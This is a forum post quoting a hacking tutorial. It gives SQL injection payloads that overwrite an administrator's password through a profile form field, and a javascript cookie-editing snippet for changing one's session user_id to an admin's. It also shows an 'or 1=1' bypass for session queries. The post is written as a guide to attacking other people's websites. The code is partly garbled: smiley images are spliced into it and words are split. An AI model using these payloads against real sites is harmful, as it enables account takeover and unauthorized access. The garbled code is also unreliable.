Reply to thread

Message: <blockquote data-quote="saamxvr" data-source="post: 4401102" data-attributes="member: 109029">ACQUIRING DATABASE INFORMATION A very logic way of acquiring system information from a website's database is by causing errors in the sql queries. These errors can be created through search forms, dynamic links, or session cookies. Most sql injection papers explain how dynamic links and text boxes can be used to execute sql queries but in my opinion, this vulnurability is more common in other input types (select boxes, hidden fields, checkboxes and radio buttons, and cookies!). Mixing data types generally crashes a webpage if it's not well coded. Take for example a link to "memberinfo.php?o_id=1". If your goal is to crash that page it would be a good idea to stick in a " or a ' in the o_id variable. If you're lucky you will get a debug message containing the crippled sql query. After you have all the information you need and you know what you're going after you're ready to hack the hell out of every page that you have access to.  CHANGING FIELDS' VALUES The first form you think of is the profile page. Most profile pages ignore a user's intellectuals and don't mask out,for example, select boxes. A way of exploiting this vulnerability is by injecting a sql query in the value property of the field.  javascript:alert(document.profileform.user_sex.val  ue="gay\',user_pasword=\'HACKED\' WHERE user_id=1#");  If we assume that the server side sql query looks something like this:  "UPDATE user_data SET user_password='$user_password',user_email='$user_e  mail',user_sex='$user_sex' WHERE user_id=$user_id";  Then the final query will look somewhat like this:  "UPDATE user_data SET user_password='mypassword',user_email='myemail',us  er_sex='gay', user_password='HACKED' WHERE user_id=1 #' WHERE user_id=7382";  # Is a sql comment operator.  2. Bypassing Session Cookies  OVERRIDING BASIC SESSION COOKIE AUTHENTICATION Most of the time session handling is done with the use of cookies. The cookies tell the webpage who you are and what you have access to and what you don't have access to. If the page does not handle session cookies correctly a hacker might be able to change their identity to that of another user's. Cookies are stored in "window.document.cookie". With javascript we are able to erase,edit,create cookies for any website. This task is more complicated than regular types of attacks. I will not go into great detail about how it's done.  To View the Cookie: javascript:alert(unescape(document.cookie));  To Change Cookie Data:  javascript:alert(window.c=function a(n,v,nv){c=document.cookie;c=c.substring(c.indexO  f<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="smilie smilie--sprite smilie--sprite23" alt="(n)" title="Thumbs down    (n)" loading="lazy" data-shortname="(n)" />+n.length,c.length);c=c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.c ookie=n+"="+escape(nc);return unescape(document.cookie);});alert(c(prompt("cooki e name:",""),prompt("replace this value:",""),prompt("with::","")));  So If You are logged in as "John Doe" in <a href="http://www.strange-shahn.net/sforums/redirector.php?url=http%3A%2F%2Fwww.ima13370h4x0r.net" target="_blank">www.ima13370h4x0r.net</a> and your session cookie reads:  SessionData= a:3:{s:11:"SessionUser";s:5:"75959";s:9:"SessionID  ";i:70202768;s:9:"LastVisit";i:1078367189;} The cookie is actually serialized but you should be able to recognize "75959" as your user_id. Some of the time you will find a website that stores data (like user_id) in cookies but does not typecast the data. This is a serious hole in the site's code because any user is able to change their user_id to any other user or administrator user_id. Changing the cookie value is easy once you have declared the window.c function. First change s:5:"75959" to s<img src="http://www.viprasys.org/vb/images/smilies/8.gif" alt="" class="fr-fic fr-dii fr-draggable " style="" />:"ADMINID" where x is the length of the new value. So if you want to change 75959 to 1. You must change s:5:"75959" to s:1:"1" <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="smilie smilie--sprite smilie--sprite1" alt=":-)" title="Smile    :-)" loading="lazy" data-shortname=":-)" /> Sometimes you will need to change 75959 to "13 or 1=1" in order to bypass any WHERE statements any sql session queries used to keep you logged in the website.</blockquote>

Verification: Hathara warak wissa keeyada? (Hathara wadi karanna 20)

Top Bottom